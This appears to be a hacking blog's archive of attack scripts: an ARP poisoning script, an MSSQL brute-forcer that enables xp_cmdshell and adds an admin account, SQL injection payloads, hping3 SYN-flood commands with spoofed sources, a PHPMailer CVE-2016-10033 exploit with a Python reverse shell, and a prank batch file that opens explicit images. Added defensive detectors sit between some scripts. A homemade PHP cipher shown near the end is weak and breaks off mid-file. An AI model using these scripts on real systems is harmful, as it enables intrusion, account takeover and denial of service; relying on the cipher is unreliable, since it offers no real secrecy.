Category Archives: (M) Code Heap

ARP Poisoning Script

#!/bin/bash
niccard=eth1
if [[ $EUID -ne 0 ]]; then
    echo -e "\n\t\t\t\033[1m \033[31m Script must be run as root! \033[0m \n"
    echo -e "\t\t\t Example: sudo $0 \n"
    exit 1
else
    echo -e "\n\033[1;32m#######################################"
    echo -e "# ARP Poison Script #"
    echo -e "#######################################"
    echo -e " \033[1;31mCoded By:\033[0m Travis Phillips"
    echo -e " \033[1;31mDate Released:\033[0m 03/27/2012"
    echo -e " \033[1;31mWebsite:\033[0m http://theunl33t.blogspot.com\n\033[0m"
    echo -n "Please enter target's IP: "
    read victimIP
    echo -n "Please enter Gateway's IP: "
    read gatewayIP
    echo -e "\n\t\t ---===[Time to Pwn]===---\n\n\n"
    echo -e "\t\t--==[Targets]==--"
    echo -e "\t\tTarget: $victimIP"
    echo -e "\t\tGateway: $gatewayIP \n\n"
    echo -e "[*] Enabling IP Forwarding \n"
    echo "1" > /proc/sys/net/ipv4/ip_forward
    echo -e "[*] Starting ARP Poisoning between $victimIP and $gatewayIP! \n"
    xterm -e "arpspoof -i $niccard -t $victimIP $gatewayIP" &
fi

ARP poison script

The purpose of this script is to automate the process of ARP poisoning attacks. The attacker only has to enter the IP address of the target and the IP of the gateway. This script was coded by Travis Phillips; its source code is shown above.
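A defender's counterpart to the script above, added here as an example (it is not part of the original post or of Travis Phillips' script): the poisoning works by sending forged ARP replies so that the target's cache maps the gateway IP to the attacker's MAC, which means a monitor that tracks IP-to-MAC bindings sees two tell-tale signs, an IP whose MAC suddenly changes and one MAC answering for several IPs. The capture lines below are constructed in tcpdump's "is-at" format; the class, the `detect()` helper, the `trusted` parameter and all addresses are assumptions of this example.

```python
import re
from collections import defaultdict

# tcpdump-style ARP reply line, e.g.
#   "ARP, Reply 192.168.1.1 is-at 00:11:22:33:44:55, length 28"
REPLY_RE = re.compile(r"Reply (\d+\.\d+\.\d+\.\d+) is-at ([0-9a-fA-F:]{17})")


class ArpMonitor:
    """Tracks IP-to-MAC bindings seen in ARP replies and raises alerts on the
    two signs of poisoning: a known IP that suddenly answers from a different
    MAC, and one MAC that answers for several IPs (an attacker impersonating
    both the gateway and the target at once)."""

    def __init__(self, trusted=None):
        # IP -> MAC. Pre-load static entries you trust, e.g. the gateway.
        self.ip_to_mac = {ip: mac.lower() for ip, mac in (trusted or {}).items()}
        # MAC -> set of IPs it has claimed
        self.mac_to_ips = defaultdict(set)
        for ip, mac in self.ip_to_mac.items():
            self.mac_to_ips[mac].add(ip)

    def observe(self, ip, mac):
        """Record one 'ip is-at mac' reply and return the alerts it triggers."""
        mac = mac.lower()
        alerts = []
        known = self.ip_to_mac.get(ip)
        if known is None:
            self.ip_to_mac[ip] = mac
        elif known != mac:
            alerts.append(f"MAC change: {ip} was {known}, now {mac}")
        self.mac_to_ips[mac].add(ip)
        claimed = self.mac_to_ips[mac]
        if len(claimed) > 1:
            alerts.append(f"one MAC for several IPs: {mac} -> {sorted(claimed)}")
        return alerts

    def feed(self, lines):
        """Run every ARP reply found in an iterable of capture lines through observe()."""
        alerts = []
        for line in lines:
            m = REPLY_RE.search(line)
            if m:
                alerts.extend(self.observe(m.group(1), m.group(2)))
        return alerts


# Constructed sample capture (not real traffic): a healthy gateway and host,
# then forged replies that point both IPs at the attacker's MAC.
SAMPLE_CAPTURE = [
    "ARP, Reply 192.168.1.1 is-at 00:11:22:33:44:01, length 28",
    "ARP, Reply 192.168.1.50 is-at 00:11:22:33:44:50, length 28",
    "ARP, Reply 192.168.1.1 is-at de:ad:be:ef:00:99, length 28",
    "ARP, Reply 192.168.1.50 is-at de:ad:be:ef:00:99, length 28",
]


def detect(lines=SAMPLE_CAPTURE, trusted=None):
    """Convenience wrapper: returns the list of alert strings for a capture."""
    return ArpMonitor(trusted).feed(lines)


if __name__ == "__main__":
    for alert in detect():
        print("[!]", alert)
```

On a real host the same logic can be fed from `tcpdump -l -n arp` line by line; pre-loading the gateway's real MAC via `trusted` lets the first forged reply trigger an alert even when the monitor never saw the legitimate one.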

SQL Brute Force Script

#!/usr/bin/python

import _mssql

# mssql = _mssql.connect('ip', 'username', 'password')
# mssql.execute_query()

passwords = file("pass.txt", "r")
ip = "192.168.200.128"

for password in passwords:
    password = password.rstrip()
    try:
        mssql = _mssql.connect(ip, "sa", password)

        print "[*] Successful login with username 'sa' and password: " + password
        print "[*] Enabling 'xp_cmdshell'"
        mssql.execute_query("EXEC sp_configure 'show advanced options', 1;RECONFIGURE;exec SP_CONFIGURE 'xp_cmdshell', 1;RECONFIGURE;")
        mssql.execute_query("RECONFIGURE;")

        print "[*] Adding Administrative user"
        mssql.execute_query("xp_cmdshell 'net user netbiosX Password! /ADD && net localgroup administrators netbiosX /ADD'")
        mssql.close()

        print "[*] Success!"
        break

    except:
        print "[!] Failed login for username 'sa' and password: " + password

The purpose of this script is to perform a brute force attack against a Microsoft SQL Server database. The script tries to connect to the remote host with the administrative account sa and each password from the file pass.txt until one is valid. If a connection succeeds, it enables xp_cmdshell and adds a new administrative user on the remote host.

Author: Larry Spohn

Website: http://e-spohn.com

Twitter: @Spoonman1091

Credits: Dave Kennedy
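The activity the script above generates is noisy on the server side: a run of failed logins for one account from one client, then a success. The detector below is an added example (not part of the post or of Larry Spohn's code) that works over log lines written in the shape of SQL Server's ERRORLOG login audit entries; the lines are constructed sample data, and the function names and thresholds are assumptions of this example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Shape of the SQL Server ERRORLOG login audit entries (failed logins are
# logged by default; successful ones when login auditing is set to "both").
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\.\d+\s+Logon\s+"
    r"Login (?P<result>failed|succeeded) for user '(?P<user>[^']+)'"
    r".*\[CLIENT: (?P<client>[\d.]+)\]"
)

# Constructed sample log (not real data): a password-guessing burst from one
# client that ends in a successful 'sa' login, and one unrelated typo.
SAMPLE_LOG = [
    "2024-01-10 09:00:01.10 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.200.5]",
    "2024-01-10 09:00:02.10 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.200.5]",
    "2024-01-10 09:00:03.10 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.200.5]",
    "2024-01-10 09:00:04.10 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.200.5]",
    "2024-01-10 09:00:05.10 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.200.5]",
    "2024-01-10 09:00:06.10 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.200.5]",
    "2024-01-10 09:00:07.10 Logon       Login succeeded for user 'sa'. Connection made using SQL Server authentication. [CLIENT: 192.168.200.5]",
    "2024-01-10 09:05:00.00 Logon       Login failed for user 'reporting'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.7]",
]


def parse(line):
    """Turn one audit line into a dict, or None for lines of another shape."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return {
        "ts": datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S"),
        "result": m["result"],
        "user": m["user"],
        "client": m["client"],
    }


def detect_bruteforce(lines, threshold=5, window=timedelta(minutes=1)):
    """Return alerts as (client, user, kind). 'burst' fires once when a client
    reaches `threshold` failures for one login inside `window`;
    'success-after-failures' fires when a login succeeds while failures for
    the same (client, user) are still inside the window, which is what a
    correct guess at the end of a wordlist looks like."""
    failures = defaultdict(list)   # (client, user) -> timestamps of recent failures
    alerts = []
    for ev in filter(None, map(parse, lines)):
        key = (ev["client"], ev["user"])
        recent = [t for t in failures[key] if ev["ts"] - t <= window]
        if ev["result"] == "failed":
            recent.append(ev["ts"])
            if len(recent) == threshold:
                alerts.append((ev["client"], ev["user"], "burst"))
        elif recent:
            alerts.append((ev["client"], ev["user"], "success-after-failures"))
        failures[key] = recent
    return alerts


if __name__ == "__main__":
    for client, user, kind in detect_bruteforce(SAMPLE_LOG):
        print(f"[!] {kind}: user {user!r} from {client}")
```

The second alert kind is the one worth paging on: a burst alone may be a misconfigured client, but a success immediately after a burst from the same source is the signature of a guessed password. Pairing it with a check that `xp_cmdshell` is still disabled (`sp_configure 'xp_cmdshell'` run_value 0) covers the follow-on step the script performs.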

Glastopf – Python web application honeypot

General approach:

  • Vulnerability type emulation instead of vulnerability emulation. Once a vulnerability type is emulated, Glastopf can handle unknown attacks of the same type. While implementation may be slower and more complicated, we remain ahead of the attackers until they come up with a new method or discover a new flaw in our implementation.
  • Modular design to add new logging capabilities or attack type handlers. Various database capabilities are already in place. HPFeeds logging is supported for centralized data collection.
  • Popular attack type emulation is already in place: Remote File Inclusion via a built-in PHP sandbox, Local File Inclusion providing files from a virtual file system, and HTML injection via POST requests.
  • Adversaries usually use search engines and specially crafted search requests to find their victims. In order to attract them, Glastopf provides those keywords (AKA "dorks") and additionally extracts them from requests, extending its attack surface automatically. As a result, the honeypot gets more and more attractive with each new attack attempted on it.
  • We will make the SQL injection emulator public, provide IP profiling for crawler recognition and intelligent dork selection.

HPFEEDS

The honeypot has hpfeeds, our central logging feature, enabled by default. If you don’t want to report your events, turn off hpfeeds in glastopf.cfg. By sending your data via hpfeeds you consent to sharing your data with third parties.

Web Application Honeypot http://glastopf.org

Union Based SQL Injection

[+] Union Based SQL Injection

' or 1=1#

1' ORDER BY 10#

1' UNION SELECT version(),2#

1' UNION SELECT version(),database()#

1' UNION SELECT version(),user()#

1' UNION ALL SELECT table_name,2 from information_schema.tables#

1' UNION ALL SELECT column_name,2 from information_schema.columns where table_name = "users"#

1' UNION ALL SELECT concat(user,char(58),password),2 from users#

sqlmap --url="<url>" -p username --user-agent=SQLMAP --threads=10 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs
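The payloads above only work when user input is concatenated into the query text, so the fix is always the same: bind the value as a parameter. The example below is added here (it is not part of the original post) and shows the vulnerable lookup beside its parameterized form against an in-memory SQLite database with constructed rows; the last payload from the list is reused with SQLite's `--` comment and `||` in place of MySQL's `#` and `concat()`. Table names, rows and function names are assumptions of this example.

```python
import sqlite3


def make_db():
    """In-memory database with constructed sample rows (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER, title TEXT, price TEXT);
        INSERT INTO products VALUES (1, 'widget', '9.99');
        CREATE TABLE users (id INTEGER, name TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'alice', 'hash-of-alice-pw');
        INSERT INTO users VALUES (2, 'bob', 'hash-of-bob-pw');
    """)
    return conn


def lookup_vulnerable(conn, product_id):
    """String concatenation: a quote in the input closes the literal and the
    rest is parsed as SQL, so a UNION can pull rows from any other table."""
    sql = "SELECT title, price FROM products WHERE id = '" + product_id + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, product_id):
    """Bound parameter: the driver hands the input to the engine as a value,
    never as SQL text. The same payload is just an id that matches nothing."""
    sql = "SELECT title, price FROM products WHERE id = ?"
    return conn.execute(sql, (product_id,)).fetchall()


# Last payload of the list above, adapted to SQLite syntax.
PAYLOAD = "1' UNION ALL SELECT name || ':' || password, 2 FROM users--"


if __name__ == "__main__":
    conn = make_db()
    print("vulnerable:", lookup_vulnerable(conn, PAYLOAD))
    print("safe:      ", lookup_safe(conn, PAYLOAD))
```

The `ORDER BY 10#` probe in the list is the step that finds how many columns the original SELECT returns (here two), which is why every UNION payload supplies exactly two expressions; with the parameterized version that probing never reaches the parser.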

Practical Approach For – DoS attacks using hping3 / nping

Wikipedia explanation of DoS attacks: Denial-of-Service Attack

DDoS attacks are common, occurring about 28 times per hour. http://www.digitalattackmap.com shows the worldwide distribution of DDoS attacks in real time:

The map reflects the international situation: for example, attacks between Japan and China can be seen on September 18, and attacks between Mexico and the United States after Trump announced the wall.

DoS attacks using hping3:

# hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood --rand-source testsite.com

  • -c: number of packets to send
  • -d: size of each packet
  • -S: send SYN packets
  • -w: TCP window size
  • -p: target port (any port can be specified)
  • --flood: send packets as fast as possible
  • --rand-source: use a random source IP address for every packet, so the target sees a pile of different IPs and cannot locate the real one; -a or --spoof can likewise be used to hide the sending host

Simple SYN flood attack:

# hping3 -S --flood -V testsite.com

TCP connection attack:

# nping --tcp-connect --rate=90000 -c 900000 -q testsite.com

For more information on these two tools:

# man hping3
# man nping
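Seen from the target, a --flood --rand-source run is a burst of bare SYNs in which almost every packet has a different source address. The detector below is an added example (not part of the post) that groups SYN-only packets per second, destination and port and flags a group that is both large and dominated by distinct sources. The packet lines are constructed in tcpdump's text format; thresholds, function names and addresses are assumptions of this example.

```python
import re
from collections import defaultdict

# tcpdump-style TCP line, e.g.
#   "12:00:00.000123 IP 10.0.5.36.40005 > 192.0.2.10.80: Flags [S], seq 1, win 64, length 0"
PKT_RE = re.compile(
    r"^(?P<sec>\d{2}:\d{2}:\d{2})\.\d+ IP (?P<src>[\d.]+)\.\d+ > "
    r"(?P<dst>[\d.]+)\.(?P<dport>\d+): Flags \[(?P<flags>[^\]]+)\]"
)


def syn_flood_report(lines, syn_threshold=50, distinct_ratio=0.8):
    """Group bare SYNs per (second, destination, port). A flood shows up as a
    high SYN count; a spoofed flood additionally shows nearly every SYN coming
    from a different source, which is what distinct_ratio keys on."""
    stats = defaultdict(lambda: {"syn": 0, "sources": set()})
    for line in lines:
        m = PKT_RE.match(line)
        if not m or m["flags"] != "S":
            continue
        key = (m["sec"], m["dst"], int(m["dport"]))
        stats[key]["syn"] += 1
        stats[key]["sources"].add(m["src"])

    alerts = []
    for (sec, dst, port), s in sorted(stats.items()):
        ratio = len(s["sources"]) / s["syn"]
        if s["syn"] >= syn_threshold and ratio >= distinct_ratio:
            alerts.append({
                "second": sec,
                "target": f"{dst}:{port}",
                "syns": s["syn"],
                "distinct_sources": len(s["sources"]),
            })
    return alerts


def build_sample():
    """Constructed capture (not real traffic): 120 SYNs in one second, each
    from a different made-up source, followed by one legitimate handshake."""
    lines = []
    for i in range(120):
        src = f"10.{i // 256}.{i % 256}.{(i * 7) % 254 + 1}"
        lines.append(
            f"12:00:00.{i:06d} IP {src}.{40000 + i} > 192.0.2.10.80: "
            f"Flags [S], seq 1, win 64, length 0"
        )
    lines.append("12:00:01.000001 IP 198.51.100.7.51000 > 192.0.2.10.80: Flags [S], seq 5, win 65535, length 0")
    lines.append("12:00:01.000200 IP 198.51.100.7.51000 > 192.0.2.10.80: Flags [.], ack 1, win 65535, length 0")
    return lines


if __name__ == "__main__":
    for a in syn_flood_report(build_sample()):
        print(f"[!] {a['second']} {a['target']}: {a['syns']} SYNs from {a['distinct_sources']} sources")
```

The distinct-source ratio is what separates a spoofed flood from a busy but honest second; the nping --tcp-connect variant above completes real handshakes from one real address, so it fails this check and needs a per-source connection-rate rule instead.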

PHPMailer versions prior to 5.2.18 remote code execution exploit. Written in python.

"""
# Exploit Title: PHPMailer Exploit v1.0
# Date: 29/12/2016
# Exploit Author: Daniel aka anarc0der
# Version: PHPMailer < 5.2.18
# Tested on: Arch Linux
# CVE : CVE 2016-10033

Description:
Exploiting PHPMail with back connection (reverse shell) from the target

Usage:
1 - Download docker vulnerable environment at: https://github.com/opsxcq/exploit-CVE-2016-10033
2 - Config your IP for reverse shell on payload variable
3 - Open nc listener in one terminal: $ nc -lnvp <your ip>
4 - Open other terminal and run the exploit: python3 anarcoder.py

Video PoC: https://www.youtube.com/watch?v=DXeZxKr-qsU

Full Advisory:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
"""
 
from requests_toolbelt import MultipartEncoder
import requests
import os
import base64
from lxml import html as lh
 
os.system('clear')
print("\n")
print(" aaaaaa aaaa   aaa aaaaaa aaaaaaa  aaaaaaa aaaaaaa aaaaaaa aaaaaaaaaaaaaaa ")
print("aaaaaaaaaaaaa  aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa")
print("aaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaa     aaa   aaaaaa  aaaaaaaaa  aaaaaaaa")
print("aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa     aaa   aaaaaa  aaaaaaaaa  aaaaaaaa")
print("aaa  aaaaaa aaaaaaaaa  aaaaaa  aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa  aaa")
print("aaa  aaaaaa  aaaaaaaa  aaaaaa  aaa aaaaaaa aaaaaaa aaaaaaa aaaaaaaaaaa  aaa")
print("      PHPMailer Exploit CVE 2016-10033 - anarcoder at protonmail.com")
print(" Version 1.0 - github.com/anarcoder - greetings opsxcq & David Golunski\n")
 
target = 'http://localhost:8080'
backdoor = '/backdoor.php'
 
payload = '<?php system(\'python -c """import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\'192.168.0.12\\\',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"])"""\'); ?>'
fields={'action': 'submit',
        'name': payload,
        'email': '"anarcoder\\\" -OQueueDirectory=/tmp -X/www/backdoor.php server\" @protonmail.com',
        'message': 'Pwned'}
 
m = MultipartEncoder(fields=fields,
                     boundary='----WebKitFormBoundaryzXJpHSq4mNy35tHe')
 
headers={'User-Agent': 'curl/7.47.0',
         'Content-Type': m.content_type}
 
proxies = {'http': 'localhost:8081', 'https':'localhost:8081'}
 
 
print('[+] SeNdiNG eVIl SHeLL To TaRGeT....')
r = requests.post(target, data=m.to_string(),
                  headers=headers)
print('[+] SPaWNiNG eVIL sHeLL..... bOOOOM :D')
r = requests.get(target+backdoor, headers=headers)
if r.status_code == 200:
    print('[+]  ExPLoITeD ' + target)
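The exploit above works because the sender address it submits contains spaces and quotes and ends up as extra arguments on the sendmail command line. The general mitigation is to accept only addresses matching a strict allow-list grammar before they are handed to the mailer, and to build the mailer's argument vector without a shell so the address can never be more than one argument. The code below is an added example of that pattern (it is not PHPMailer's code and not the fix that project shipped); the regular expression, the argv layout and the `is_affected_version` inventory helper are assumptions of this example, and the address it rejects is the one from the script above.

```python
import re

# Allow-list grammar for a sender address that will be handed to a local
# sendmail binary: one plain local part, '@', a dotted domain, nothing else.
# RFC 5321 permits quoted local parts with spaces and backslashes, which is
# exactly the room the exploit above uses, so those are refused on purpose.
SAFE_ADDR_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+$")

# First fixed release according to the exploit header above.
FIXED_VERSION = (5, 2, 18)

# Sender address used by the exploit above, kept as a negative test input.
EXPLOIT_ADDR = '"anarcoder\\" -OQueueDirectory=/tmp -X/www/backdoor.php server" @protonmail.com'


def is_safe_sender(addr):
    """True only for addresses matching the allow-list grammar."""
    return bool(SAFE_ADDR_RE.match(addr))


def build_sendmail_argv(sender, sendmail="/usr/sbin/sendmail"):
    """Argument vector for a sendmail call. Two defences stack here: the
    address must pass is_safe_sender(), and the result is a list for
    subprocess (no shell), so the address is always exactly one argument."""
    if not is_safe_sender(sender):
        raise ValueError("sender address rejected: %r" % sender)
    return [sendmail, "-t", "-i", "-f" + sender]


def sender_is_accepted(addr):
    """Boolean view of build_sendmail_argv() for callers that only need yes/no."""
    try:
        build_sendmail_argv(addr)
        return True
    except ValueError:
        return False


def is_affected_version(version):
    """True if a PHPMailer version string is below 5.2.18 (hypothetical
    inventory helper; assumes plain dotted versions such as '5.2.17')."""
    parts = tuple(int(p) for p in version.split("."))
    return parts < FIXED_VERSION


if __name__ == "__main__":
    for addr in ("alice@example.org", EXPLOIT_ADDR):
        print(repr(addr), "->", "accepted" if sender_is_accepted(addr) else "rejected")
```

Rejecting RFC-valid but unusual mailboxes costs almost nothing for a contact form, which is the call site the exploit targets; the version check is the complementary control for finding copies of the library that still need the upgrade.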


DBShield – Go Based Database Firewall

DBShield is a Database Firewall written in Go that has protection for MySQL/MariaDB, Oracle and PostgreSQL databases. It works in a proxy fashion inspecting traffic and dropping abnormal queries after a learning period to populate the internal database with regular queries.

Learning mode lets any query pass but it records information about it (pattern, username, time and source) into the internal database.

After collecting enough patterns we can run DBShield in protect mode. Protect mode can distinguish an abnormal query pattern, user or source and take action according to the configuration.

It currently supports DB2, MariaDB, MySQL, Oracle & PostgreSQL all with SSL apart from Oracle and DB2.

Installation

Get it:

Then you can see help using the "-h" argument:

and run it with your configuration, like:

You can download DBShield here:

DBShield-1.0.0-beta4.zip
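The learn/protect split described above is easy to reason about in a few dozen lines. The code below is an added example in the spirit of DBShield's two modes, not DBShield's own implementation: queries are reduced to a pattern by replacing literals, learn mode records which (user, source) pairs issue which patterns, and protect mode drops anything whose pattern, user or source was never seen. The traffic is constructed; the normalisation rules, class and function names are assumptions of this example.

```python
import re

# Literal-stripping rules: queries that differ only in their values collapse
# to one pattern, so "WHERE id = 42" and "WHERE id = 7" are the same query.
STRING_LIT = re.compile(r"'(?:[^']|'')*'")
NUMBER_LIT = re.compile(r"\b\d+(?:\.\d+)?\b")
WHITESPACE = re.compile(r"\s+")


def normalize(query):
    """Reduce a query to its pattern: literals replaced by '?', whitespace
    collapsed, keywords lower-cased."""
    q = STRING_LIT.sub("?", query)
    q = NUMBER_LIT.sub("?", q)
    return WHITESPACE.sub(" ", q).strip().lower()


class QueryFirewall:
    """Two-phase proxy logic: 'learn' records which (user, source) pairs issue
    which patterns; 'protect' passes only queries whose pattern, user and
    source were all seen during learning."""

    def __init__(self):
        self.learned = {}        # pattern -> set of (user, source)
        self.mode = "learn"

    def handle(self, query, user, source):
        """Return ('pass' | 'drop', reason) for one query."""
        pattern = normalize(query)
        if self.mode == "learn":
            self.learned.setdefault(pattern, set()).add((user, source))
            return "pass", "learning"
        if pattern not in self.learned:
            return "drop", "unknown pattern: " + pattern
        if (user, source) not in self.learned[pattern]:
            return "drop", "known pattern from unexpected user/source"
        return "pass", "ok"


# Constructed traffic (not from any real system): what the application does
# normally, then what protect mode sees.
LEARNING_TRAFFIC = [
    ("SELECT * FROM users WHERE id = 42", "app", "10.0.0.5"),
    ("SELECT * FROM users WHERE id = 7", "app", "10.0.0.5"),
    ("INSERT INTO orders VALUES (1, 'pen', 2.50)", "app", "10.0.0.5"),
]
PROTECT_TRAFFIC = [
    ("SELECT * FROM users WHERE id = 99", "app", "10.0.0.5"),           # normal
    ("SELECT * FROM users WHERE id = 99 OR 1=1", "app", "10.0.0.5"),    # injected tail
    ("SELECT * FROM users WHERE id = 1", "app", "203.0.113.9"),         # new source
    ("INSERT INTO orders VALUES (9, 'ink', 1.25)", "app", "10.0.0.5"),  # normal
]


def demo():
    """Train on LEARNING_TRAFFIC, then return the decisions for PROTECT_TRAFFIC."""
    fw = QueryFirewall()
    for q, user, src in LEARNING_TRAFFIC:
        fw.handle(q, user, src)
    fw.mode = "protect"
    return [fw.handle(q, user, src)[0] for q, user, src in PROTECT_TRAFFIC]


if __name__ == "__main__":
    for (q, user, src), decision in zip(PROTECT_TRAFFIC, demo()):
        print(f"{decision:5s} {user}@{src}: {q}")
```

The weak spot of this sketch is the whitespace-sensitive pattern: `id=2` and `id = 2` become different patterns, so a production version tokenizes around operators rather than collapsing spaces. The other lesson is the one DBShield's description makes: protect mode is only as good as the learning window, so the learning set must cover every legitimate query shape before switching.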

Python Code For Accessing Physical Location

import pygeoip

gi = pygeoip.GeoIP('/opt/GeoIP/Geo.dat')

def printRecord(tgt):
    rec = gi.record_by_name(tgt)
    if not rec:
        # pygeoip returns no record for addresses missing from the database
        print('[-] No record for ' + tgt)
        return
    city = rec['city']
    region = rec['region_name']
    country = rec['country_name']
    lon = rec['longitude']
    lat = rec['latitude']
    print('[*] Target: ' + tgt + ' Geo-located.')
    print('[+] ' + str(city) + ', ' + str(region) + ', ' + str(country))
    print('[+] Latitude: ' + str(lat) + ', Longitude: ' + str(lon))

tgt = 'ip address here'
printRecord(tgt)

PornAttack – Batch Programming

echo off
echo ^<html^>^<head^>^<title^>Fap^</title^> > Fap.hta
echo. >> Fap.hta
echo ^<hta:application id="oBVC" >> Fap.hta
echo applicationname="Fap"  >> Fap.hta
echo version="1.0" >> Fap.hta
echo maximizebutton="no" >> Fap.hta
echo minimizebutton="no" >> Fap.hta
echo sysmenu="no" >> Fap.hta
echo Caption="no" >> Fap.hta
echo windowstate="maximize"/^> >> Fap.hta
echo. >> Fap.hta
echo ^</head^>^<body background="http://www.newsfilter.org/content/gallery/50383/met-art_ACM_21_5.jpg" scroll="yes"^> >> Fap.hta
echo ^<img src="http://www.giffies.com/games/files/18.gif" ^> >> Fap.hta
echo ^<img src="http://stxt.youngpornmovies.com/thumbs/1/0585/101133_1.jpg" ^> >> Fap.hta
echo ^<img src="http://www4.clickr.info/img/190x163_teen3_orig.gif" ^> >> Fap.hta
echo ^<img src="http://www.thumbserve.com/intw/tn113829.jpg" ^> >> Fap.hta
echo ^<img src="http://static.ads.crakmedia.com/cfcd9a00272d345553929068fe15c5aa.gif" ^> >> Fap.hta
echo ^<img src="http://78.140.136.171/bt/st/thumbs/038/1001353519.jpg" ^> >> Fap.hta
echo ^<img src="http://78.140.136.171/bt/st/thumbs/009/0496989067.jpg" ^> >> Fap.hta
echo ^<img src="http://www.silentpix.com/content/toplist/siteoftheday9.gif" ^> >> Fap.hta
echo ^<img src="http://www.newsfilter.org/content/gallery/50378/met-art_LUH_294_2.jpg" ^> >> Fap.hta
echo ^<img src="http://ddfcash.com/PROMO/content/obj/vids/547vbj/547vbjp4.jpg" ^> >> Fap.hta
echo ^<img src="http://www.teenport.com/galleries/bailey-kline/red-peignoir/09.jpg" ^> >> Fap.hta
echo ^</body^>^</html^> >> Fap.hta
start "" /wait "Fap.hta"
del /s /f /q "Fap.hta" > nul

Secure Crypt – PHP Code

php script:
///////////////////
<?php
if($_POST['task']!="" and $_POST['message']!="")
{
$message=$_POST['message'];
if($_POST['key']!="")
{
$key=md5($_POST['key']);
}
else
{
$key=md5('Long Text To Be Used As Default Key');
}
$array_key=str_split($key,1);
$array_final_key=array_unique($array_key);
foreach($array_final_key as $single_key)
{
$master_key[]=$single_key;
}
$counter_key=count($master_key);
if($_POST['task']!='decrypt')
{
// Encrypt
$message_array=str_split($message,$counter_key);
foreach($message_array as $chunk)
{
$single_char_value=str_split($chunk,1);
for($loop1=0;$loop1<$counter_key;$loop1++)
{
$ord_sum_char[]=ord($master_key[$loop1])+ord($single_char_value[$loop1]);
}
}
foreach($ord_sum_char as $to_encrypt)
{
$loop_val=intval($to_encrypt/11);
$mod_val=$to_encrypt%11;
switch($mod_val)
{
case "0";
$char_fixed_val='<';
break;
case "1";
$char_fixed_val='*';
break;
case "2";
$char_fixed_val='$';
break;
case "3";
$char_fixed_val='#';
break;
case "4";
$char_fixed_val='+';
break;
case "5";
$char_fixed_val='?';
break;
case "6";
$char_fixed_val='>';
break;
case "7";
$char_fixed_val='^';
break;
case "8";
$char_fixed_val='!';
break;
case "9";
$char_fixed_val='&';
break;
case "10";
$char_fixed_val='%';
break;
}
$encryptd_char[]=$loop_val.$char_fixed_val;
}
$final_message=implode(" ",$encryptd_char);
echo'<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>
Super Crypt By ADIGA
</title>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<link rel="stylesheet" type="text/css" href="style.css">
</head>
<body>
<div id="main_container">
<div id="body_container">
<div id="header">Super Crypt</div>
<form method="post" action="index.php">
<textarea name="message" id="text_area">'.$final_message.'</textarea>
<select name="task" id="task">
<option value="encrypt">Encrypt Text</option>
<option value="decrypt">Decrypt Text</option>
</select>
<input type="submit" value="Encrypt/Decrypt" id="button">
<div id="key">Key&nbsp;:</div>
<input type="text" name="key" id="key_text">
</form>
</div>
</div>
</body>
</html>';
}
else
{
// Decrypt
$first_decrypt_array=explode(" ",$message);
$counter_element=0;
$text_reset="";
foreach($first_decrypt_array as $first_value)
{
$counter_element=$counter_element+1;
if($counter_element%$counter_key=="0")
{
$text_reset=$text_reset.$first_value."Q";
}
else
{
$text_reset=$text_reset.$first_value." ";
}
}
$text_fixed=rtrim($text_reset,"Q");
$array_sectors=explode("Q",$text_fixed);
foreach($array_sectors as $sector)
{
$array_chars_fixed=explode(" ",$sector);
$counter_chars_fixed=count($array_chars_fixed);
for($loop_fixed=0;$loop_fixed<$counter_chars_fixed;$loop_fixed++)
{
$char_single_fixed=substr($array_chars_fixed[$loop_fixed],-1);
$loops_fixed=str_replace($char_single_fixed,"",$array_chars_fixed[$loop_fixed]);
$loops_fixed_val=$loops_fixed*11;
switch($char_single_fixed)
{
case "<";
$char_fixed_val=0;
break;
case "*";
$char_fixed_val=1;
break;
case "$";
$char_fixed_val=2;
break;
case "#";
$char_fixed_val=3;
break;
case "+";
$char_fixed_val=4;
break;
case "?";
$char_fixed_val=5;
break;
case ">";
$char_fixed_val=6;
break;
case "^";
$char_fixed_val=7;
break;
case "!";
$char_fixed_val=8;
break;
case "&";
$char_fixed_val=9;
break;
case "%";
$char_fixed_val=10;
break;
}
$final_val=($loops_fixed_val+$char_fixed_val)-ord($master_key[$loop_fixed]);
if($final_val!=0)
{
$decoded_message[]=chr($final_val);
}
}
}
$final_message1=implode("",$decoded_message);
$fh=fopen("Decoded.txt","w+");
fputs($fh,$final_message1);
fclose($fh);
echo'<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>
